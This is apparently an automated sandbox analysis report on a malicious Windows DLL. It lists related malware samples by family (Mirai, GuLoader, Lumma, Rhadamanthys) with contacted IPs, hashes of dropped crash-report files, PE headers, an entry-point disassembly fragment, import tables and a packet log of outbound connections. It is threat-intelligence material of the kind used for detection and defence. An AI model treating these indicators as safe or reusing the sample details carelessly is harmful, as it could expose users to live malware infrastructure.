                              AMAZON-02US | arm.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 3.6.240.229
                              AMAZON-02US | arm7.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 13.61.42.195
                              AMAZON-02US | x86_32.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 54.245.29.89
                              AMAZON-02US | RECOUVREMENT -FACTURER1184521.pdf | Get hash | malicious | Unknown | Browse | 13.226.2.54
                              AMAZON-02US | QhR8Zp6fZs.lnk | Get hash | malicious | RHADAMANTHYS | Browse | 3.124.142.205
                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                              3b5074b1b5d032e5620f69f9f700ff0e | PURCHASE ORDER TRC-090971819130-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 34.120.62.213
                              3b5074b1b5d032e5620f69f9f700ff0e | PAYMENT ADVICE 750013-1012449943-81347-pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 34.120.62.213
                              3b5074b1b5d032e5620f69f9f700ff0e | Tii6ue74NB.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar | Browse | 34.120.62.213
                              3b5074b1b5d032e5620f69f9f700ff0e | Non-Disclosure Agreement.html | Get hash | malicious | Unknown | Browse | 34.120.62.213
                              3b5074b1b5d032e5620f69f9f700ff0e | rs.lnk.d.lnk | Get hash | malicious | Unknown | Browse | 34.120.62.213
                              3b5074b1b5d032e5620f69f9f700ff0e | ny.lnk.d.lnk | Get hash | malicious | Unknown | Browse | 34.120.62.213
                              3b5074b1b5d032e5620f69f9f700ff0e | hnsadjhfg18De.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 34.120.62.213
                              3b5074b1b5d032e5620f69f9f700ff0e | slifdgjsidfg19.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 34.120.62.213
                              3b5074b1b5d032e5620f69f9f700ff0e | De17De16.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 34.120.62.213
                              3b5074b1b5d032e5620f69f9f700ff0e | fghdsdf17.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 34.120.62.213
                              No context
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.826332631843729
                              Encrypted:false
                              SSDEEP:96:9xFgxqhinyKy6/sjQ4RvTifntQXIDcQjc6mcEMcw3cXaXz+HbHgSQgJjrlo1zawu:Tqx4iny6/S09iWWjQ5zuiFgZ24lO8u
                              MD5:BE0509AC96341C120FADA8A7C6E6E337
                              SHA1:4CAE6C9A7C5A8CF682C0E2D3427B6F03CE4A577B
                              SHA-256:B5BF11B2B8C6E19634998EE403765A4E32B29535A07184190A43533174EE9A20
                              SHA-512:C4FF4FCCDC82EE5B8F7F9F1EEAC2258866105A4402EE5CC6CBB9CC1537D5F6FCDB5AFFE4F0C267C9B386E8F84D93517E0C5CEC25E744519CA5485868DC9413F2
                              Malicious:false
                              Preview:Version=1 EventType=APPCRASH EventTime=133790924227348655 ReportType=2 Consent=1 UploadTime=133790924231098684 ReportStatus=524384 ReportIdentifier=2a385f32-0ed8-4b23-9be9-4cb8a093d60d IntegratorReportIdentifier=2908353a-1cb8-4fd2-8691-2e4de839a2bd Wow64Host=34404 NsAppName=rundll32.exe_8N8j6QojHn.dll OriginalFilename=RUNDLL32.EXE AppSessionGuid=00001a48-0001-0015-6735-62fd2252db01 TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000dd399ae46303343f9f0da189aee11c67bd8682
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.8265494557607604
                              Encrypted:false
                              SSDEEP:96:+PFPhiOyKy4sjQ4RvTifntQXIDcQjc6mcEMcw3cXaXz+HbHgSQgJjrlo1zaw85kQ:cLiOy4S09iWWjQ5zuiFgZ24lO8u
                              MD5:9333F33F3C9056A2329ADD9CC2254E3D
                              SHA1:A29A8D7B10AA90BF2A8F120A35F44D387ECCAC39
                              SHA-256:E28462EFC41A36003500C40798BA6E17F51B6DAFEA09FC83125A0ED49EBC3BEC
                              SHA-512:8787502C82D6D61146896B1B9EF69E9DC6A24D7A7DFCD5BF380D6D876E09EC86A0E19AFC254484648C78B5112141346E069EF284D2EA15874C3DAA6CB9F72968
                              Malicious:false
                              Preview:Version=1 EventType=APPCRASH EventTime=133790924163648201 ReportType=2 Consent=1 UploadTime=133790924168491853 ReportStatus=524384 ReportIdentifier=74df86cf-c037-4d76-bd86-4dd249360dfd IntegratorReportIdentifier=747fed7f-7955-4e27-97c6-9b289be2a1b1 Wow64Host=34404 NsAppName=rundll32.exe_8N8j6QojHn.dll OriginalFilename=RUNDLL32.EXE AppSessionGuid=000016e4-0001-0015-4a4f-c1f92252db01 TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000dd399ae46303343f9f0da189aee11c67bd8682
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Mini DuMP crash report, 14 streams, Thu Dec 19 14:33:42 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):60566
                              Entropy (8bit):1.6045166485516742
                              Encrypted:false
                              SSDEEP:192:fJMpns7xmoterKOM8Y1MiaVQk+ju+45dryOKtc2ZtmJX:xss7f0FY1MiaUjujYhZtI
                              MD5:7F9ED6FAE126175BA243EED690F81CC2
                              SHA1:509A0F18C4B20393BD34D9501B95DAFE5FA61D3F
                              SHA-256:8C7885E1D987270009843FAC7A90A3673E2EB12EB32AABC3AE233447EA224911
                              SHA-512:8A35C9B7DEC4DE1AE225362A0C997EF0480FD248CBCACE4121DD78A04CB67E88F1753CE990FC5F33C30709D19C5A19C92C86FBCF96FE90701DB12A689C7292DE
                              Malicious:false
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8762
                              Entropy (8bit):3.704832385894897
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJuSE4XTe6YQ8Ogmfk5fpra89b+cuGflAKm:R6lXJDu6YbOgmfk5R+Mfl8
                              MD5:F3E6753B3E9FF46E47B8F740A2424EED
                              SHA1:48975288480172BC332A50F1B350121EDAD8DA47
                              SHA-256:3E3DE0A8F40B226D889B5464FB1094D25565942D4AAEE766C2B9DE9E732E492E
                              SHA-512:8BDA5B6377084DE57ECA7D9AD9D869915DDC91FCC19D2C1A710700F90B21F63F4AEAA0A59D84A685E4781D864D1DDB5C497C5605C71350B7C2DFA198023A3B0B
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>6728</Pi
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4754
                              Entropy (8bit):4.497674272661293
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zsMtJg771I9E3WpW8VYHYm8M4JC1CdxBFHyq85mZGneptSTSDwMDd:uIjfyI7nG7VrJfr7ZpoOLDd
                              MD5:86D69188C88FE29A352194A84E55D367
                              SHA1:9379F5B22F5B21235BF9D4902C0B99ACFCE6EA4E
                              SHA-256:009425CA813F40792C12306C15AD2789C92E6837E246A54614EB24233767D0D7
                              SHA-512:C6AEC7DDB773541F8839B2BCF2F1EDECC12315316CE69D20806AF8FCE89E1564B770B9B7978D77CEF2299DF9FDA38BA6AE6101D0D9A306FBDDC35EFC1F773D0A
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="638256" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8774
                              Entropy (8bit):3.706456305023809
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJ2UXH6Y7VjVygmfk5fprH89bNmuGfPvm:R6lXJdX6YJpygmfk5KNGf2
                              MD5:9B11969EC42671AE03FB36D6354F4A58
                              SHA1:1D54B8876976FD26EDF3187F52B4AE428FBD1600
                              SHA-256:BBC97830BDBFF324E323F72354EA4D29EADBB063192CD1A006850697A7792BDE
                              SHA-512:E2F20AD4A9105DFF7D1CD97C2EEFEF1DB44E3925114297DAA891FB280834A4CE6D0435DB1B8FC2A4957D9F56F872B84B8AE04EEC7A80530C05E9FE107E363C60
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>5860</Pi
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4754
                              Entropy (8bit):4.499610788658855
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zsMtJg771I9E3WpW8VYyYm8M4JC1CdxBFEyq85mZGTptSTS3d:uIjfyI7nG7VuJfQ70poO3d
                              MD5:980890EF126A684AB56E20AED12B1050
                              SHA1:053A7DB1DB393CFF2621778708B8EEE1BF17851D
                              SHA-256:E13AA29DA0F5B69E33F0D68CF6A19C14A6963DACA0FE0D9B83C37F5C2919ADC4
                              SHA-512:CF9A37470D7BFE24E1C15B6EDDDF56D4817950449726871D68ECCED736AE087551D34858581817D75EA853500161C5553B1714DE9BFC69F590CA3DD610FB7EBF
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="638256" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Mini DuMP crash report, 14 streams, Thu Dec 19 14:33:36 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):69198
                              Entropy (8bit):1.5376480818652762
                              Encrypted:false
                              SSDEEP:192:pfRnbIARlp2iOM8YHlMEzYODoD+RFe5PEvA1PtNbDZ:fnbbYFYFMEzYURW/bV
                              MD5:1A8B4AAC743E3C0643755D618038701D
                              SHA1:76830AD084EE9211331A71073337F3C001BC22FB
                              SHA-256:1E10469ACAB350F81D7D3FAF0065A6ED44A883727F779A4B9DA6C0A3A68BE3A2
                              SHA-512:5516D7075F3219C0B5C16792563C16F13DE57EEC7EE29569D4ED9BC4D0AFD5933BB128102D5C6FC29234C429955C544983F5C7B3A1B1A957BB1D0B4334E24DC0
                              Malicious:false
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):1835008
                              Entropy (8bit):4.469514622390272
                              Encrypted:false
                              SSDEEP:6144:jzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNMjDH5S:fZHtYZWOKnMM6bFpaj4
                              MD5:3D6D63D9B3FCD105A3B9F37C1515EA5B
                              SHA1:B4463F6F5DCB8EBD91152B72D5C1DBC47516D048
                              SHA-256:450E36D15FF4AB9F6AC491AAE43B2E2A56A67764F9EC12C65784318D687D3FD7
                              SHA-512:7E77F2E0D7CA1E5966E9D228927A4D821B3F4A96EFC178377AA6773474BC575E84CEDBD6C4962F3E9675F9936F8AFF0ABE01515078820392807C741D101B7B46
                              Malicious:false
                              File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Entropy (8bit):6.401808042340704
                              TrID:
                              • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                              • Win64 Executable (generic) (12005/4) 10.17%
                              • Generic Win/DOS Executable (2004/3) 1.70%
                              • DOS Executable Generic (2002/1) 1.70%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                              File name:8N8j6QojHn.dll
                              File size:3'645'790 bytes
                              MD5:78b199f0a4f453fc8a4a05d05695e91e
                              SHA1:6ad0ec9ca2464af8c9cddf6d8959850c7e106f2f
                              SHA256:7f675bb692afe3b8f6dcb4bd533de73e871f167e884c98a04453ec16da0e59dd
                              SHA512:fb189d535a99f5548d92b391c2273040ddd6d61528daac4e4b92a9da14bc0a41c1e9bcf6d6f0d96122945d73c3ef995f7e08d671bb690c14052262ad8fa567b6
                              SSDEEP:49152:Lg4eSTLnnStKQlAtCITgJL77D6nMTABbVfPoNyiClmE+S/iCz7g2:l/fptPTi65+S/ie02
                              TLSH:E8F51903E613089CC03AD1B497977932BA31BC494335BAFF5AC45B222F56BE07A79749
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..NX|.NX|.NX|.. ..GX|.. y..X|.. x.CX|.^...GX|.^.x.@X|.^.y.oX|.. }.LX|..-}.SX|.NX}.pY|.NX|..Y|...|.OX|.....OX|...~.OX|.RichNX|
                              Icon Hash:7ae282899bbab082
                              Entrypoint:0x1802bfbc0
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x180000000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                              Time Stamp:0x672B7282 [Wed Nov 6 13:43:30 2024 UTC]
                              TLS Callbacks:0x802916a0, 0x1
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:0
                              File Version Major:6
                              File Version Minor:0
                              Subsystem Version Major:6
                              Subsystem Version Minor:0
                              Import Hash:1a26f8d82312018d551f2e0028c5eb49
                              Signature Valid:
                              Signature Issuer:
                              Signature Validation Error:
                              Error Number:
                              Not Before, Not After
                                Subject Chain
                                  Version:
                                  Thumbprint MD5:
                                  Thumbprint SHA-1:
                                  Thumbprint SHA-256:
                                  Serial:
                                  Instruction
                                  dec eax
                                  mov dword ptr [esp+08h], ebx
                                  dec eax
                                  mov dword ptr [esp+10h], esi
                                  push edi
                                  dec eax
                                  sub esp, 20h
                                  dec ecx
                                  mov edi, eax
                                  mov ebx, edx
                                  dec eax
                                  mov esi, ecx
                                  cmp edx, 01h
                                  jne 00007F9320AF6487h
                                  call 00007F9320AF64A4h
                                  dec esp
                                  mov eax, edi
                                  mov edx, ebx
                                  dec eax
                                  mov ecx, esi
                                  dec eax
                                  mov ebx, dword ptr [esp+30h]
                                  dec eax
                                  mov esi, dword ptr [esp+38h]
                                  dec eax
                                  add esp, 20h
                                  pop edi
                                  jmp 00007F9320AF6320h
                                  int3
                                  int3
                                  int3
                                  dec eax
                                  mov dword ptr [esp+18h], ebx
                                  push ebp
                                  dec eax
                                  mov ebp, esp
                                  dec eax
                                  sub esp, 30h
                                  dec eax
                                  mov eax, dword ptr [000ADBECh]
                                  dec eax
                                  mov ebx, 2DDFA232h
                                  cdq
                                  sub eax, dword ptr [eax]
                                  add byte ptr [eax+3Bh], cl
                                  ret
                                  jne 00007F9320AF64F6h
                                  dec eax
                                  and dword ptr [ebp+10h], 00000000h
                                  dec eax
                                  lea ecx, dword ptr [ebp+10h]
                                  call dword ptr [0001D69Eh]
                                  dec eax
                                  mov eax, dword ptr [ebp+10h]
                                  dec eax
                                  mov dword ptr [ebp-10h], eax
                                  call dword ptr [0001D698h]
                                  mov eax, eax
                                  dec eax
                                  xor dword ptr [ebp-10h], eax
                                  call dword ptr [0001D4FCh]
                                  mov eax, eax
                                  dec eax
                                  lea ecx, dword ptr [ebp+18h]
                                  dec eax
                                  xor dword ptr [ebp-10h], eax
                                  call dword ptr [0001D7F4h]
                                  mov eax, dword ptr [ebp+18h]
                                  dec eax
                                  lea ecx, dword ptr [ebp-10h]
                                  dec eax
                                  shl eax, 20h
                                  dec eax
                                  xor eax, dword ptr [ebp+18h]
                                  dec eax
                                  xor eax, dword ptr [ebp-10h]
                                  dec eax
                                  xor eax, ecx
                                  dec eax
                                  mov ecx, FFFFFFFFh
                                  Name | Virtual Address | Virtual Size | Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x36a8f0 | 0x78 | .rdata
                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x36a968 | 0x118 | .rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37b000 | 0x3f0 | .rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x370000 | 0xa104 | .pdata
                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x379400 | 0xd40 |
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x37c000 | 0x2e60 | .reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x366920 | 0x54 | .rdata
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x366b00 | 0x28 | .rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3667e0 | 0x140 | .rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x2dd000 | 0x6e8 | .rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                  .text | 0x1000 | 0x2db040 | 0x2db200 | eb89e6117e562f42dee0472f1e93f28a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata | 0x2dd000 | 0x8f236 | 0x8f400 | 5f7686d6b36ddb2236ec8c754c35b634 | False | 0.4832910667539267 | data | 6.032330304078537 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data | 0x36d000 | 0x26e0 | 0x1400 | abecdfb9703961d2506dffebe3630ad3 | False | 0.159765625 | data | 2.1126320736313366 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .pdata | 0x370000 | 0xa104 | 0xa200 | 0ed626b7ebecc3bdc355d551f00abe86 | False | 0.5114052854938271 | data | 6.006328827673415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .rsrc | 0x37b000 | 0x3f0 | 0x400 | 91081ec536ee22308130ad5ac40a2000 | False | 0.4658203125 | data | 4.228310792125718 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc | 0x37c000 | 0x2e60 | 0x3000 | 06eaa847943e10b2cc7f5eb457c31ed8 | False | 0.344970703125 | data | 5.409227767100945 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                  RT_VERSION | 0x37b0a0 | 0x1a0 | data | English | United States | 0.49759615384615385
                                  RT_MANIFEST | 0x37b240 | 0x1af | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5359628770301624
DLL | Import
bcryptprimitives.dll | ProcessPrng
api-ms-win-core-synch-l1-2-0.dll | WaitOnAddress, WakeByAddressAll, WakeByAddressSingle
ws2_32.dll | getsockname, getpeername, WSASocketW, bind, connect, listen, getsockopt, shutdown, recv, send, WSASend, setsockopt, WSAIoctl, WSAStartup, accept, socket, WSACleanup, WSAGetLastError, freeaddrinfo, ioctlsocket, closesocket, getaddrinfo
kernel32.dll | GetOEMCP, GetCommandLineA, FlsAlloc, GetACP, FreeLibrary, HeapFree, GetProcessHeap, FlsGetValue, lstrlenW, CreateMutexA, GetCurrentProcessId, WaitForSingleObjectEx, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, WideCharToMultiByte, ReleaseMutex, GetNativeSystemInfo, GetSystemInfo, FlsSetValue, GetLastError, LCMapStringW, GetModuleHandleA, GetComputerNameExW, VirtualQuery, LoadLibraryExW, IsValidCodePage, FindFirstFileExW, HeapAlloc, GetModuleHandleExW, GetModuleHandleW, RtlPcToFileHeader, RaiseException, GetStringTypeW, HeapSize, FormatMessageW, FlsFree, CreateEventW, SetStdHandle, GetConsoleOutputCP, DuplicateHandle, EncodePointer, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InterlockedFlushSList, SetHandleInformation, RtlUnwindEx, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcess, LoadLibraryA, GetProcAddress, CreateIoCompletionPort, GetQueuedCompletionStatusEx, PostQueuedCompletionStatus, CloseHandle, GetCPInfo, ReadFile, GetOverlappedResult, WriteFile, SetFileCompletionNotificationModes, Sleep, WriteConsoleW, MultiByteToWideChar, GetCommandLineW, ExitProcess, GetFileType, GetConsoleMode, HeapReAlloc, GetSystemTimePreciseAsFileTime, SetWaitableTimer, CreateWaitableTimerExW, CreateThread, CancelIo, WaitForMultipleObjects, ReadFileEx, CreateNamedPipeW, GetTempPathW, CopyFileExW, DeleteFileW, FindFirstFileW, WaitForSingleObject, SetFileInformationByHandle, SetThreadStackGuarantee, GetCurrentThread, SetLastError, GetFullPathNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetModuleFileNameW, GetEnvironmentVariableW, GetCurrentDirectoryW, WriteFileEx, SleepEx, SwitchToThread, QueryPerformanceCounter, QueryPerformanceFrequency, FreeEnvironmentStringsW, DeleteProcThreadAttributeList, GetEnvironmentStringsW, CompareStringOrdinal, GetFileAttributesW, CreateProcessW, GetStdHandle, TerminateProcess, GetExitCodeProcess, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, FindNextFileW, FindClose, CreateFileW, FlushFileBuffers, GetFileInformationByHandle, GetFileInformationByHandleEx, SetFilePointerEx
advapi32.dll | RegisterServiceCtrlHandlerExW, SetServiceStatus, SystemFunction036, RegCloseKey, RegQueryValueExW, RegOpenKeyExW
oleaut32.dll | SafeArrayCreateVector, SysAllocStringLen, SysStringLen, SysFreeString, GetErrorInfo, SafeArrayPutElement, SafeArrayGetLBound, SafeArrayDestroy, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayCreate, SafeArrayGetUBound, VariantClear
ole32.dll | CoSetProxyBlanket, CoInitializeEx, CoCreateInstance, CoInitializeSecurity
user32.dll | GetSystemMetrics
secur32.dll | AcquireCredentialsHandleA, QueryContextAttributesW, ApplyControlToken, EncryptMessage, AcceptSecurityContext, FreeContextBuffer, InitializeSecurityContextW, DecryptMessage, DeleteSecurityContext, FreeCredentialsHandle
crypt32.dll | CertFreeCertificateChain, CertDuplicateCertificateChain, CertEnumCertificatesInStore, CertAddCertificateContextToStore, CertOpenStore, CertCloseStore, CertDuplicateStore, CertDuplicateCertificateContext, CertFreeCertificateContext, CertVerifyCertificateChainPolicy, CertGetCertificateChain
bcrypt.dll | BCryptGenRandom
ntdll.dll | RtlNtStatusToDosError, NtCreateFile, NtWriteFile, NtCancelIoFileEx, NtDeviceIoControlFile, NtReadFile
PSAPI.DLL | GetModuleFileNameExW, EnumProcessModules, GetModuleInformation
Name | Ordinal | Address
DllMain | 1 | 0x180134480
ServiceMain | 2 | 0x180122500
get_hostfxr_path | 3 | 0x180134490
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Dec 19, 2024 15:33:37.226315022 CET4974780192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:37.345891953 CET804974713.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:37.345968008 CET4974780192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:37.346776009 CET4974780192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:37.466161966 CET804974713.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:38.303883076 CET4974780192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:40.514132023 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:40.633680105 CET804975813.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:40.633867979 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:40.634614944 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:40.754399061 CET804975813.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:42.285434961 CET804975813.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:42.330512047 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:42.605783939 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:42.725562096 CET804975813.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:42.725708961 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:42.845298052 CET804975813.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:43.199361086 CET804975813.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:43.250797033 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:43.484348059 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:43.484410048 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:43.484529972 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:43.538897991 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:43.538925886 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:44.758753061 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:44.758894920 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:44.760616064 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:44.760623932 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:44.760934114 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:44.812588930 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:44.822614908 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:44.822688103 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:45.197041035 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:45.197119951 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:45.197721958 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:45.198025942 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:45.198045969 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:48.250279903 CET4978580192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:33:48.369898081 CET8049785195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:33:48.369996071 CET4978580192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:33:48.370152950 CET4978580192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:33:48.489675045 CET8049785195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:33:49.716358900 CET8049785195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:33:49.765749931 CET4978580192.168.2.6195.133.1.117
